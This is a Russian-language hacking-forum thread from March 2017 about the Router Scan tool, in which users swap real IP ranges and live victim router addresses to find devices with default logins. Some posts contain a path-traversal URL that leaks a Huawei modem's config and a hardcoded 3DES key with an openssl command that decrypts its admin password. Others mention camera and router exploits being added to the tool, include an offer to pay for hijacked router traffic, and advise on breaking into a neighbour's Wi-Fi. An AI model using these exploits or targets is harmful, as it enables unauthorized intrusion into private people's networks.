PDA

Просмотр полной версии : прога Router Scan


Страницы : 1 2 3 4 5 6 7 8 9 10 11 [12] 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31

binarymaster
07.03.2017, 02:37
А вот зачем знать кто больше всех выгрузил точек?



Мотивация к загрузке ещё большего кол-ва точек в базу.

TommyWhite
07.03.2017, 13:43
Товарищи, а как добавлять эксплоиты в прогу ?

Ossen
07.03.2017, 16:44
Товарищи, а как добавлять эксплоиты в прогу ?



Методом "плясок с бубном" ))

TommyWhite
07.03.2017, 18:08
Методом "плясок с бубном" ))



Можно было бы взять пачку эксплоитов с роутерсплоита и сюда интегрировать =)

shinZa
07.03.2017, 23:49
Мотивация к загрузке ещё большего кол-ва точек в базу.


Наверно что могла наломать прога уже выгружено. Наломаные вайфайслаксом или калинуком и т.д. вы не проверите, так как они не пробиваются по ип (тем более он динамический). Я щас прогой пользуюсь для сортитовки по девайсам. Хорошобы - Отсканил вайфай опредилил какие маки надо. Прогой по макам опредилил ипешки и в бой.

binarymaster
08.03.2017, 01:28
Наверно что могла наломать прога уже выгружено.



Каждые сутки на 3WiFi в среднем загружается 6000 новых точек доступа. Смотрите динамику.



Наломаные вайфайслаксом или калинуком и т.д. вы не проверите, так как они не пробиваются по ип



Это не мешает добалять их в базу, правда без айпи.



Хорошобы - Отсканил вайфай опредилил какие маки надо. Прогой по макам опредилил ипешки и в бой.



Айпи по макам не определить, если их нет в базе.

Всё проще - берёте свои физические координаты и вбиваете в поиск диапазонов на 3WiFi.

kag12345
08.03.2017, 13:52
Добрый день уважаемые!

У нас в городке, да и по всей Рассее - матушки установлена туева хуча Ростелекомовских роутеров (Eltex - NTP-RG-1402G-W:rev.C), ревизия В и более старых, по умолчанию вход в админку: user/ user. Однако почему то Router scan v.2.53 автоматически не может забрать пароли...

К примеру проверьте такие диапазоны: 37.20.128.0/17

37.20.0.0/17

178.184.128.0/17

пишет done, а в гуд результатах ничего нет, а в ручную безпроблем заходишь в админку (user/ user), к примеру: http://178.184.161.82/, попробуйте зайти.

А в проге результатов нет...

Ленивые установщики Ростелекома забили х... на смену дефолтных паролей от вебинтерфейса роутера...

_Danil_
11.03.2017, 12:45
Есть ли новые Beta версии RouterScan?

Payer
11.03.2017, 12:46
искать ip для этого провайдера evpanet.com



http://bgp.he.net/AS43936#_prefixes

Prefix Description

31.131.64.0/20 PE Zinstein Hariton Vladimirovich

http://bgp.he.net/images/flags/ua.gif?1282328089

91.195.230.0/23 PE Zinstein Hariton Vladimirovich

http://bgp.he.net/images/flags/ua.gif?1282328089

176.101.0.0/20 PE Zinstein Hariton Vladimirovich

http://bgp.he.net/images/flags/ua.gif?1282328089

193.106.160.0/23 PE Zinstein Hariton Vladimirovich

http://bgp.he.net/images/flags/ua.gif?1282328089

193.106.162.0/23 PE Zinstein Hariton Vladimirovich

Payer
11.03.2017, 13:59
мне ненужна Москва а Ваши ip именно там и находятся



Не знал, что Евпатория уже часть Москвы.

Провайдер из Евпатории и абоненты у него в Евпатории. Вроде логично. Или не?

Payer
11.03.2017, 14:10
и посмотрите в яндексе местоположение



Та хоть в хуяндексе.

Регион неблагополучный в ближайшее время будет иметь траблы с геолокацией.

Я причем к этой беде?

-------

У меня Евпаторию показывает. Надо Гондурас?

marina222
11.03.2017, 14:14
Таки да , вы не китаец ))

http://s018.radikal.ru/i515/1703/07/6458bc44ec5c.gif

user100
11.03.2017, 15:42
Таки да , вы не китаец ))

http://s018.radikal.ru/i515/1703/07/6458bc44ec5c.gif



Вам шашечки или ехать:

http://s018.radikal.ru/i520/1703/ae/068566619bc2t.jpg

Payer
11.03.2017, 18:33
Таки да , вы не китаец ))

http://s018.radikal.ru/i515/1703/07/6458bc44ec5c.gif



Вот после таких сообщений и отпадает желание помогать этим хакерам недоделанным.

binarymaster
11.03.2017, 19:42
Есть ли новые Beta версии RouterScan?



С момента выпуска последней ночной сборки мало изменений.

Felis-Sapiens
16.03.2017, 00:52
Уязвимость в ip-камерах WIFICAM: https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html

Добавил в Router Scan её и эту уязвимость в роутерах Netgear. Последняя правда нечасто срабатывает, а с камерами достаточно неплохо:

http://s8.hostingkartinok.com/uploads/thumbs/2017/03/b11138201e63ab9003bbcb8629fa5dc5.png

hydra
16.03.2017, 11:45
Тут на днях,обнаружил,что в базе 3wifi стали появляться точки с моего района.Ещё недавно их там небыло.Значит всё-таки можно до них добраться.

Решил помучать Router Scan.Собрал на 3wifi диапазоны.Отсканил.

5.141.0.0/16

31.162.64.0/18

78.153.16.0/22

78.153.0.0/20

93.90.224.0/21

93.90.232.0/21

93.90.0.0/16

94.51.128.0/19

94.140.128.0/20

94.140.144.0/20

94.140.0.0/16

95.169.144.0/20

95.169.128.0/20

95.169.0.0/16

109.198.224.0/20

109.198.240.0/20

109.198.0.0/16

141.105.24.0/22

141.105.28.0/22

141.105.0.0/16

176.222.20.0/22

185.168.236.0/23

185.168.238.0/23

185.168.0.0/16

188.16.0.0/18

Ни одной точки с района не найдено.А всё,что находится уже есть в базе.Как они там оказались?(точки с моего города)

Сам сижу на РТК.Чтобы сканировать точки МТС,подключаюсь к точкам МТС.Пробовал сканить локалку.

Cети 10.0.0.0/8, 172.16.0.0/12.

Глухо как в танке.Вообще ничего.

tracert до 10.0.0.1 выдаёт:

1 31 ms 2 ms 2 ms myhome.ru [192.168.1.1]

2 6 ms 5 ms 4 ms 172.16.253.5

3 5 ms 5 ms 5 ms 85-235-63-69.rev.utk.ru [85.235.63.69]

4 5 ms 5 ms 7 ms 10.220.32.158

5 9 ms 8 ms 9 ms 10.97.42.178

6 8 ms 7 ms 6 ms 10.97.42.177

7 6 ms 4 ms 5 ms 10.97.42.161

8 27 ms 5 ms 7 ms 10.0.0.1

Роутер,через который сканирую:

DIR-615,динамический IP,включены протоколы PPtP и L2TP (если нужно,дам более полную инфу)

В настройках маршрутизации пусто.Где-то тут читал,что для доступа к локалке,нужно задать статический маршрут.

Кому не лень,подскажите нубяре,как это сделать.

binarymaster
16.03.2017, 11:53
DIR-615,динамический IP,включены протоколы PPtP и L2TP (если нужно,дам более полную инфу)

В настройках маршрутизации пусто.Где-то тут читал,что для доступа к локалке,нужно задать статический маршрут.

Кому не лень,подскажите нубяре,как это сделать.



Поточнее бы, какой именно DIR-615, так как они разные бывают, в плане веб интерфейса.

А так да, нужно прописывать маршрут 10.0.0.0/8 на шлюз локальной сети. Возможно также потребуется сменить режим PPTP на PPTP Dual Access (если такое есть в интерфейсе).

binarymaster
16.03.2017, 11:56
Если у кого-то есть беспроводной доступ к подобной точке доступа:


BSSID: 78:F5:FD:xx:xx:xx
ESSID: MegaFon XXXX-XXXX
Модель: Huawei (ребрендинг под Мегафон / карманный 4G модем с Wi-Fi)
Прошу отозваться. Требуется для теста новой сборки Router Scan.

Есть ли доступ к админке роутера - не важно. Я нашёл уязвимость.

http://192.168.1.1/resource/images/../../../../../var/curcfg.xml

hydra
16.03.2017, 12:19
Поточнее бы, какой именно DIR-615, так как они разные бывают, в плане веб интерфейса.

А так да, нужно прописывать маршрут 10.0.0.0/8 на шлюз локальной сети. Возможно также потребуется сменить режим PPTP на PPTP Dual Access (если такое есть в интерфейсе).



Модель DIR-615

Версия прошивки:2.5.12

Ревизия web: f8628c6ca947adb5bd3c7dcd34407ebfdb9d9a17

Апаратной ревизии,к сожалению сказать не могу.

Alex19845
16.03.2017, 13:57
Приветствуйю binarymaster! Можно попросить тебя выложить последнюю версию проги с добавленными эксплоитами?

Спасибо

Kakoluk
16.03.2017, 14:02
Приветствуйю binarymaster! Можно попросить тебя выложить последнюю версию проги с добавленными эксплоитами?

Спасибо


А лучше добавить постоянную ссылку в профиль, дабы не искать каждый раз по битым.

На http://stascorp.com/load/1-1-0-56 ведь уже давно нет обновки...

binarymaster
16.03.2017, 14:15
А лучше добавить постоянную ссылку в профиль, дабы не искать каждый раз по битым.



А в чём проблема? В поиске всегда выводит последнюю в самом верху.

http://i.imgur.com/G7D9cNd.png

Alex19845
16.03.2017, 14:22
А в чём проблема?



проблема в том, что на rgho.st по вашей ссылке, прога 3-х месячной давности. а можно если не затруднит, последние доработки скинуть?

Спасибо.

Kakoluk
16.03.2017, 14:23
А в чём проблема? В поиске всегда выводит последнюю в самом верху.



Для меня нет проблем. Просто тема перестанет пестрить вопросами: "а где?" .

Alex19845
16.03.2017, 14:28
тема перестанет пестрить вопросами: "а где?"



это точно

binarymaster
16.03.2017, 14:31
Для меня нет проблем. Просто тема перестанет пестрить вопросами: "а где?" .


Некоторые пользователи, особенно новички, не смогут догадаться, чей профиль открывать, чтобы увидеть ссылку на пост с ночной сборкой.

Если бы была возможность редактировать первый пост темы... но увы, я не @СЕРЖ32 (https://forum.antichat.xyz/members/248819/).



проблема в том, что на rgho.st по вашей ссылке, прога 3-х месячной давности. а можно если не затруднит, последние доработки скинуть?

Спасибо.



Хотелось бы сначала разобраться вот с этой штукой, я уже нашёл одного испытуемого.

Alex19845
16.03.2017, 14:38
Хотелось бы сначала разобраться вот с этой штукой, я уже нашёл одного испытуемого.



отлично! интересен результат

Felis-Sapiens
16.03.2017, 14:59
Тут на днях,обнаружил,что в базе 3wifi стали появляться точки с моего района.Ещё недавно их там небыло.Значит всё-таки можно до них добраться.

Решил помучать Router Scan.Собрал на 3wifi диапазоны.Отсканил.

...

Ни одной точки с района не найдено.А всё,что находится уже есть в базе.Как они там оказались?(точки с моего города)

Сам сижу на РТК.Чтобы сканировать точки МТС,подключаюсь к точкам МТС.Пробовал сканить локалку.



Примеры точек можно? Попробуйте добавить порт 161

Kakoluk
16.03.2017, 15:56
Примеры точек можно? Попробуйте добавить порт 161



161 помог! Ребята-кодеры, почаще делитесь соображениями! (с улыбкой, но без сарказма)



Попозже попробую добавить порт.Сейчас не дома.



Парсит.

hydra
16.03.2017, 16:26
Сейчас в гостях у кореша сижу.Он на МТС.Убазарил посканировать от него.

Добавил в прогу порт 161.QBR-1041WU стало много появляться.Но почти ни на один не заходит.Данные не парсятся.

Через браузер зайти можно.

Какие порты ещё можно добавить?

binarymaster
16.03.2017, 16:34
Данные не парсятся.

Через браузер зайти можно.



У вас точно последняя ночная сборка? QBR-1041WU должны обрабатываться.

Kakoluk
16.03.2017, 16:38
У вас точно последняя ночная сборка? QBR-1041WU должны обрабатываться.



Ага.

Видимо у него ооочень старая, я только что попробовал сборкой 3-месячной давности, и с 3-х разных провайдеров, везде нормально парсит.

binarymaster
16.03.2017, 16:57
Сборка 2.53 Stas'M Качал сегодня.

Отсюда http://stascorp.com/load/1-1-0-56



В таком случае вот этот мой пост специально для вас:

https://forum.antichat.ru/posts/4061320

Нет, ну вы же ведь не новичок... вы в сообществе уже год или больше (столько я помню ваш ник), и серьёзно не в курсе про ночные сборки?

hydra
16.03.2017, 17:16
В таком случае вот этот мой пост специально для вас:

https://forum.antichat.ru/posts/4061320

Нет, ну вы же ведь не новичок... вы в сообществе уже год или больше (столько я помню ваш ник), и серьёзно не в курсе про ночные сборки?


Всё,уже исправился.Туплю чё-то не подетски.

Alex19845
17.03.2017, 14:18
Подскажите, от чего зависит вытягивание инфы с DIR-615 Hardware Version: E4 Firmware Version: 5.10RU ??

просто с одного инфа вытягивается:

http://89.23.200.167:8080/login_auth.asp

а с другой такой же модели нет. :

http://91.149.145.165:8008/login_auth.asp

Спасибо.

binarymaster
17.03.2017, 15:20
а с другой такой же модели нет. :

http://91.149.145.165:8008/login_auth.asp


Логин/пароль известен?

Alex19845
17.03.2017, 15:33
Логин/пароль известен?



нет.

так ничё не получится сотворить?

binarymaster
17.03.2017, 15:36
нет.

так ничё не получится сотворить?


В первом случае RS сначала авторизовался под стандартным User:, а уже после получил пасс админа.

Alex19845
17.03.2017, 15:46
В первом случае



это ты про http://89.23.200.167:8080 ?

а со вторым модемом может чё получиться?

binarymaster
17.03.2017, 15:49
это ты про http://89.23.200.167:8080 ?



Ага.



а со вторым модемом может чё получиться?



Каким образом? У вас есть эксплойт?

Alex19845
17.03.2017, 15:58
Каким образом? У вас есть эксплойт?



не, у меня нету ну.. значит владельцу 615-го на 8008 порту крупно повезло. Ушел таки от преследования RS )))

Felis-Sapiens
20.03.2017, 14:33
Есть ли доступ к админке роутера - не важно. Я нашёл уязвимость.

http://192.168.1.1/resource/images/../../../../../var/curcfg.xml



Пароль к веб-интерфейсу зашифрован 3DES (key = 3E4F5612EF64305955D543B0AE3508807968905960C44D37, iv = 8049E91025A6B548)


echo '2n+mVpCOAaY=' | openssl enc -d -a -des3 -K 3E4F5612EF64305955D543B0AE3508807968905960C44D37 -iv 8049E91025A6B548 -nopad ; echo
user

tigos1
21.03.2017, 04:07
В таком случае вот этот мой пост специально для вас:

https://forum.antichat.ru/posts/4061320

Нет, ну вы же ведь не новичок... вы в сообществе уже год или больше (столько я помню ваш ник), и серьёзно не в курсе про ночные сборки?


Извините, нужно что-то увидеть между строк?

А то в тупой поиск - тоже только сборка за прошлый год..

binarymaster
21.03.2017, 04:12
Извините, нужно что-то увидеть между строк?

А то в тупой поиск - тоже только сборка за прошлый год..


Ну всё правильно, другой сборки пока нет.

Kevin Shindel
21.03.2017, 04:14
у меня шось RGHO.ST не раздупляется, можно залить последнюю ночную сборку на зеркало?

binarymaster
21.03.2017, 04:15
у меня шось RGHO.ST не раздупляется, можно залить последнюю ночную сборку на зеркало?



Нет. Тренируйтесь в пользовании VPN.

Заливаю туда из принципа, чтобы всегда искать по одному ключевому слову.

binarymaster
21.03.2017, 04:25
VPN OK!



У вас DNS заражён, и в чёрном списке.

И вы удивляетесь, почему не открывается RGhost?

Kevin Shindel
21.03.2017, 04:28
У вас DNS заражён, и в чёрном списке.

И вы удивляетесь, почему не открывается RGhost?


Ок. Буду разбираться...

binarymaster
21.03.2017, 04:30
Ок. Буду разбираться...



Просто берёте и используете расширение для браузера friGate.

У меня правда всё и без него открывается.

shinZa
21.03.2017, 13:21
Уязвимость в ip-камерах WIFICAM: https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html

Добавил в Router Scan её и эту уязвимость в роутерах Netgear. Последняя правда нечасто срабатывает, а с камерами достаточно неплохо:

http://s8.hostingkartinok.com/uploads/thumbs/2017/03/b11138201e63ab9003bbcb8629fa5dc5.png


Это будет наверно самая последняя сборка??? Ссылки нет???

binarymaster
21.03.2017, 13:22
Это будет наверно самая последняя сборка??? Ссылки нет???



Успокойтесь, ссылки пока нет. Но скоро будет. Работаем.

Payer
21.03.2017, 19:55
Успокойтесь, ссылки пока нет.



- А кто ел из моей миски?

- А кто трогал мою чашку?

- А кто пользовался моей ложкой?

- А ну бляпозатыкались там! Не готовила я еще, посуда с вечера не помыта!

shinZa
21.03.2017, 21:15
Ну не готова так не готова.. че сразу в грудь стучать

AleksRull
21.03.2017, 23:48
У меня вопрос к Бинарумастеру. Есть роутер от Zte его "рутер скан" не берет, даже если вписать пароль от админки в оба списка. Вопрос такой: если дам ип и все остальное(жертвуя единстенным имеющимся интернетом) будет ли возможность в дальнейшем такие роутеры взламывать с помощью "рутер скана"?

Какой то бред написал, но думаю понятно.

Добавлю модель роутера zxhn h108n. В данный момент устанавливают ростелекомовцы в нашем регионе.

qwerty_332
21.03.2017, 23:54
Добрый вечер.

Помогите в решении задачи) Не могу понять как так может быть. Есть роутер TP-Link WR740N v4, если сканирую его из локальной сети 192.168.0.1 то роутер-скан подбирает дефолтный пароль\логин admin:admin и показывает всю информацию с роутера. Но когда сканирую удаленно с другого провайдера внешний айпишник или целую подсеть провайдера в которой этот TP-Link, то не находит абсолютно ничего. Вернее находит один-два роутера из подсети и кним подбирает пароль или через уязвимость заходит. Вопрос состоит в том чтобы из этой же сети "получить доступ" в учебных целях разумеется) к другому роутеру TP-Link WR840N или WR841N, точно не помню. Могу сканировать только по внешним адресам. Что в таком случае можно сделать? И почему из внешней сети не находит мой роутер?

Вот айпишник для примера 46.172.72.184, логин пароль заводские.

binarymaster
22.03.2017, 00:10
Какой то бред написал, но думаю понятно.



Ничуть не бред, присылайте.



если сканирую его из локальной сети 192.168.0.1 то роутер-скан подбирает дефолтный пароль\логин admin:admin и показывает всю информацию с роутера.



Какой айпи выводит в колонке WAN IP Address?

qwerty_332
22.03.2017, 00:26
Ничуть не бред, присылайте.

Какой айпи выводит в колонке WAN IP Address?



IP-адрес: 46.172.72.184

Маска подсети: 255.255.255.0

Основной шлюз: 46.172.72.1

DNS-сервер: 46.172.72.1 , 0.0.0.0

Порт 80

http://i91.fastpic.ru/big/2017/0321/f5/52adf9508bff0fcf91752c230dcd4cf5.png

binarymaster
22.03.2017, 00:32
В TL-WR740N удалённое администрирование включается специальной настройкой.

qwerty_332
22.03.2017, 00:38
В TL-WR740N удалённое администрирование включается специальной настройкой.



Действительно, когда выставить удаленный доступ и разрешить все айпишники то находит. А так получается пока нет уязвимостей для этих моделей (WR740N, WR840N, WR841N) ?

binarymaster
22.03.2017, 00:42
Получается пока нет.

qwerty_332
22.03.2017, 00:44
Ладно, будем ждать и искать) Спасибо за помощь.

moaddip
22.03.2017, 12:59
ddwrt хотелось бы поддежку/экспл0ит, спс

binarymaster
22.03.2017, 13:11
ddwrt хотелось бы поддежку/экспл0ит, спс



DD-WRT уже поддерживается давно, а о каком эксплойте идёт речь?

tigos1
23.03.2017, 04:45
DD-WRT уже поддерживается давно, а о каком эксплойте идёт речь?




Как-так (DD-WRT) ?

Возможно в программе нужно какие-то галочки выставить?

Несколько мест с WRT знаю, но ни разу не видел, чтобы подбирался пасс.

И вопрос в догонку:

TP-Link 841 (стоковая прошивка), на нём когда-то сам открыл порт для доступа снаружи.

Теперь РОУТЕРСКАНОМ могу увидеть, лишь SSID и пароль на вайфай.

Пользуюсь той сборкой, которой около 3 месяцев.

Реально ли что-то сделать, чтобы получить пасс на вход в настройки роутера?

maus
23.03.2017, 08:47
Как-так (DD-WRT) ?

Возможно в программе нужно какие-то галочки выставить?

Несколько мест с WRT знаю, но ни разу не видел, чтобы подбирался пасс.

И вопрос в догонку:

TP-Link 841 (стоковая прошивка), на нём когда-то сам открыл порт для доступа снаружи.

Теперь РОУТЕРСКАНОМ могу увидеть, лишь SSID и пароль на вайфай.

Пользуюсь той сборкой, которой около 3 месяцев.

Реально ли что-то сделать, чтобы получить пасс на вход в настройки роутера?



- попробуй этим https://forum.antichat.ru/threads/436408/page-5#post-4041408

binarymaster
23.03.2017, 11:11
Несколько мест с WRT знаю, но ни разу не видел, чтобы подбирался пасс.



Если на какой-то из них удаётся зайти удачно из браузера, но он не обрабатывается Router Scan, то пишите.

Эксплойтов на них нет, подбираются только пароли из словаря.



TP-Link 841 (стоковая прошивка) Реально ли что-то сделать, чтобы получить пасс на вход в настройки роутера?



Такого эксплойта пока нет.

matthev
23.03.2017, 17:16
ребят, напишите в лс у кого есть трафик с роутеров \ или кто готов поработать в этом направлении ($$$)

binarymaster
23.03.2017, 17:26
ребят, напишите в лс у кого есть трафик с роутеров \ или кто готов поработать в этом направлении ($$$)



А вот и очередной тип людей, из-за которых у нас роутеры пропадают.

https://forum.antichat.ru/threads/449595/

matthev
23.03.2017, 17:30
А вот и очередной тип людей, из-за которых у нас роутеры пропадают.

https://forum.antichat.ru/threads/449595/



ну у каждого свой бизнес, и думаю тут вопрос в $ как не крути он главный

но работа в бурже! рунет не интересен, и тут все свои)

прошу у кого есть контакты \ чем можете помочь - прошу в лс

fffsfs
23.03.2017, 20:21
Если на какой-то из них удаётся зайти удачно из браузера, но он не обрабатывается Router Scan, то пишите.

Эксплойтов на них нет, подбираются только пароли из словаря.

Такого эксплойта пока нет.



Почему то у меня в роутер кане ни одной точко которую я когда то видел а я все сканирую и ничего...

Kakoluk
23.03.2017, 20:32
Почему то у меня в роутер кане ни одной точко которую я когда то видел а я все сканирую и ничего...



Установленная система, настройки RS(скрин главного окна), версию программы .. желательно бы услышать.

А уж потом судить-рядить, что там RS не видит.

AleksRull
24.03.2017, 02:58
Почему то у меня в роутер кане ни одной точко которую я когда то видел а я все сканирую и ничего...



если честно ничего не понял

Сори через 5 мин дошло. Он не трезв

binarymaster
24.03.2017, 11:01
Он не трезв



У него это хроническое

fffsfs
24.03.2017, 11:40
У него это хроническое


Короче по диапазонам когда сканируешь свой диапазон показывает абсолютно не те сети, а показывает которые я никогда не видел, как там правильнее искать? *

binarymaster
24.03.2017, 11:42
Короче по диапазонам когда сканируешь свой диапазон показывает абсолютно не те сети, а показывает которые я никогда не видел, как там правильнее искать? *



А как вы определили, что выбранный диапазон именно ваш?

fffsfs
24.03.2017, 11:45
А как вы определили, что выбранный диапазон именно ваш?



По сайту 3WIFI поиску диапазонов

fffsfs
24.03.2017, 11:49
А как вы определили, что выбранный диапазон именно ваш?



И на многие точки пишет php by Admin

binarymaster
24.03.2017, 11:58
По сайту 3WIFI поиску диапазонов



Возможно из вашей сети нет доступа к тем сетям (или к роутерам из тех сетей), которые вы сканируете.



И на многие точки пишет php by Admin



А зачем вы поставили все галки в модулях сканирования?

fffsfs
24.03.2017, 12:01
Возможно из вашей сети нет доступа к тем сетям (или к роутерам из тех сетей), которые вы сканируете.

А зачем вы поставили все галки в модулях сканирования?



Можете дать скрин правильно настроенной программы?

binarymaster
24.03.2017, 12:02
Можете дать скрин правильно настроенной программы?



Вряд ли, поскольку под каждый индивидуальный случай всё настраивается по-разному.

Лучше давайте ваш скриншот главного окна, и я скажу вам, где вы не правы.

fffsfs
24.03.2017, 12:05
Вряд ли, поскольку под каждый индивидуальный случай всё настраивается по-разному.

Лучше давайте ваш скриншот главного окна, и я скажу вам, где вы не правы.


Я пока не в компе Я Вам счас зайду кину тогда,но возле start scan

В первой :300

Во второй: 2000

binarymaster
24.03.2017, 12:08
В первой :300

Во второй: 2000



Между первой и второй перерывчик небольшой.

Но этих данных недостаточно для постановления диагноза... буду ждать скриншот.

fffsfs
24.03.2017, 12:13
Между первой и второй перерывчик небольшой.

Но этих данных недостаточно для постановления диагноза... буду ждать скриншот.



В лс скинул

binarymaster
24.03.2017, 12:15
В лс скинул



Рекомендую снять галки со всех модулей, кроме основного и HNAP.

Ну а так вроде ничего особенного. Возможно провайдер блокирует сканирование.

fffsfs
24.03.2017, 12:18
Рекомендую снять галки со всех модулей, кроме основного и HNAP.

Ну а так вроде ничего особенного. Возможно провайдер блокирует сканирование.



Спасибо

sha9
24.03.2017, 12:36
По сайту 3WIFI поиску диапазонов



по тем диапазонам вы не определите. точнее - много лишнего наберете. нужно фильтровать. ищите свои диапазоны по провайдеру.

Kakoluk
24.03.2017, 12:49
По сайту 3WIFI поиску диапазонов



Вот тут попробуйте http://ip.posle.info

Точность почти "до города".

sany22
24.03.2017, 13:41
Добрый день.Это мой первый пост-пытался сам,но без помощи не получается.скрин программы и отчёт nmap загрузил на яндекс диск.Это провайдер воронеж-телеком(a3net). В диапазоне ,указанном в скрине точно работал роутер tp-link,это я у друга смотрел IP.Интересует другой роутер,возможно малость в другом диапазоне того же провайдера,но так как не могу и с этим разобраться пока,на тот и не смотрю пока.Посмотрите пожалуйста-это пров блокирует сканирование как выше написано или я что-то не так сделал?надеюсь не слишком много прошу

https://yadi.sk/i/JKElKkeN3GJYjM

https://yadi.sk/d/5dS1uy983GJZ7k

Kakoluk
24.03.2017, 14:05
Добрый день.Это мой первый пост-пытался сам,но без помощи не получается.скрин программы и отчёт nmap загрузил на яндекс диск.Это провайдер воронеж-телеком(a3net). В диапазоне ,указанном в скрине точно работал роутер tp-link,это я у друга смотрел IP.Интересует другой роутер,возможно малость в другом диапазоне того же провайдера,но так как не могу и с этим разобраться пока,на тот и не смотрю пока.Посмотрите пожалуйста-это пров блокирует сканирование как выше написано или я что-то не так сделал?надеюсь не слишком много прошу

https://yadi.sk/i/JKElKkeN3GJYjM

https://yadi.sk/d/5dS1uy983GJZ7k



А вы можете трассировку выполнить, скажем до яндекса?

Кажется у вас там шлюз стоит, и есть внутренняя сеть через NAT этого шлюза.

И поглядите адрес 2-3 го прыжка(от себя).

sany22
24.03.2017, 14:10
К сожалению сейчас друг вне доступности.Я сейчас посмотрю-осталась ли в компе полный отчёт.Там была трассировка ,если я вас правильно понял

нашёл только это(если конечно это то что нужно)-теле2-это был мой ip на момент сканирования

5 46.00 ms 10.219.125.4

6 56.00 ms 10.219.127.70

7 38.00 ms enode.176.59.95.128.tele2.ru (176.59.95.128)

8 50.00 ms ttk.inet2.net (85.112.122.11)

9 65.00 ms vrz06.vrz27.transtelecom.net (217.150.44.90)

10 63.00 ms VoronezhTelecom-gw.transtelecom.net (217.150.44.89)

Kakoluk
24.03.2017, 14:24
К сожалению сейчас друг вне доступности.Я сейчас посмотрю-осталась ли в компе полный отчёт.Там была трассировка ,если я вас правильно понял



Нажмите -R(или Пуск-выполнить), Cmd - напишите в консоли: tracert ya.ru > c:\tracert.txt

Содержимое файла покажите(c:\tracert.txt).

sany22
24.03.2017, 14:36
1 2 ms 6 ms 1 ms 192.168.0.1

2 43 ms 50 ms 40 ms 10.219.0.40

3 35 ms 41 ms 38 ms 10.219.125.3

4 * * * ЏаҐўлиҐ ЁвҐаў « ®¦Ё¤ Ёп ¤«п § Їа®б .

5 332 ms 777 ms 42 ms 10.219.125.4

6 49 ms 37 ms 40 ms 10.219.127.70

7 67 ms 48 ms 44 ms enode.176.59.95.128.tele2.ru [176.59.95.128]

8 55 ms 56 ms 59 ms ihome.inet2.net [85.112.122.12]

9 * * * ЏаҐўлиҐ ЁвҐаў « ®¦Ё¤ Ёп ¤«п § Їа®б .

10 57 ms 59 ms 60 ms std-p2-be12.yndx.net [87.250.239.65]

11 62 ms 54 ms 59 ms fol5-c2-ae3.yndx.net [87.250.239.130]

12 59 ms 58 ms 59 ms www.yandex.ru [213.180.193.3]

Kakoluk
24.03.2017, 14:42
1 2 ms 6 ms 1 ms 192.168.0.1

2 43 ms 50 ms 40 ms 10.219.0.40

3 35 ms 41 ms 38 ms 10.219.125.3

4 * * * ЏаҐўлиҐ ЁвҐаў « ®¦Ё¤ Ёп ¤«п § Їа®б .

5 332 ms 777 ms 42 ms 10.219.125.4

6 49 ms 37 ms 40 ms 10.219.127.70

7 67 ms 48 ms 44 ms enode.176.59.95.128.tele2.ru [176.59.95.128]

8 55 ms 56 ms 59 ms ihome.inet2.net [85.112.122.12]

9 * * * ЏаҐўлиҐ ЁвҐаў « ®¦Ё¤ Ёп ¤«п § Їа®б .

10 57 ms 59 ms 60 ms std-p2-be12.yndx.net [87.250.239.65]

11 62 ms 54 ms 59 ms fol5-c2-ae3.yndx.net [87.250.239.130]

12 59 ms 58 ms 59 ms www.yandex.ru [213.180.193.3]



Вот у вас пров натыкал извилистых пещер!

Вам придётся взять длинную маску внутренней сети для роутерскана, и то скорее всего вы увидите только "свой"

небольшой участок локалки.

Вот. 10.219.0.0/16

binarymaster
24.03.2017, 14:47
Вам придётся взять длинную маску внутренней сети для роутерскана, и то скорее всего вы увидите только "свой"



Ещё учитывая, что это Tele2, крупный провайдер мобильного интернета, есть вероятность, что на этом диапе ничего не найдётся.

Kakoluk
24.03.2017, 14:49
Ещё учитывая, что это Tele2, крупный провайдер мобильного интернета, есть вероятность, что на этом диапе ничего не найдётся.



Беда вообще, горлышко бутылки c пробками-ниппелями:

80.69.154.0-80.69.154.255

176.59.64.0-176.59.95.255

185.78.92.0-185.78.95.255

sany22
24.03.2017, 14:49
Спсибо за помощь-отрицательный результат тоже результат!Зато душа спокойна.Буду искать другие пути -для начала найду чья это точка,а потом думать как подмазаться к хозяину.Дело не в деньгах,а в невозможности протянуть ко мне через железную дорогу оптику

Kakoluk
24.03.2017, 14:58
Спсибо за помощь-отрицательный результат тоже результат!Зато душа спокойна.Буду искать другие пути -для начала найду чья это точка,а потом думать как подмазаться к хозяину.Дело не в деньгах,а в невозможности протянуть ко мне через железную дорогу оптику



Вы лучше хеншейков c наловите, и попросите ребят тут: https://forum.antichat.ru/threads/435763/

Не думаю что есть принципиальные отказники сбрутить ваш.

sany22
24.03.2017, 15:14
Не пройдёт вариант скорей всего...Сканировал с помощью back track.WPS отключён.air-replay не помогает.Да и как смотрю там постоянно подключен только один мак и возможно это компьютер

sha9
24.03.2017, 17:22
Беда вообще, горлышко бутылки c пробками-ниппелями:

80.69.154.0-80.69.154.255

176.59.64.0-176.59.95.255

185.78.92.0-185.78.95.255






Ещё учитывая, что это Tele2, крупный провайдер мобильного интернета, есть вероятность, что на этом диапе ничего не найдётся.



вообще-то если бегло по пробкам - то кое-что есть.

80.69.154.62:8888 - D-Link DIR-620

80.69.154.125 - ZyXEL Keenetic 4G (NDMSv2)

80.69.154.137 - ZyXEL Keenetic 4G (NDMSv2)

п.с. роутерскан еще никогда не подводил

sha9
24.03.2017, 17:24
Добрый день.Это мой первый пост-пытался сам,но без помощи не получается.скрин программы и отчёт nmap загрузил на яндекс диск.Это провайдер воронеж-телеком(a3net). В диапазоне ,указанном в скрине точно работал роутер tp-link,это я у друга смотрел IP.Интересует другой роутер,возможно малость в другом диапазоне того же провайдера,но так как не могу и с этим разобраться пока,на тот и не смотрю пока.Посмотрите пожалуйста-это пров блокирует сканирование как выше написано или я что-то не так сделал?надеюсь не слишком много прошу

https://yadi.sk/i/JKElKkeN3GJYjM

https://yadi.sk/d/5dS1uy983GJZ7k



попробуйте порты добавить. иногда это помогает. судя по моему посту выше - например 8888,8080,8001 и т.д. на 3вайфай есть наборы портов на любой вкус

sha9
24.03.2017, 17:41
В диапазоне ,указанном в скрине точно работал роутер tp-link,это я у друга смотрел IP.Интересует другой роутер,возможно малость в другом диапазоне того же провайдера,но так как не могу и с этим разобраться пока,на тот и не смотрю пока.



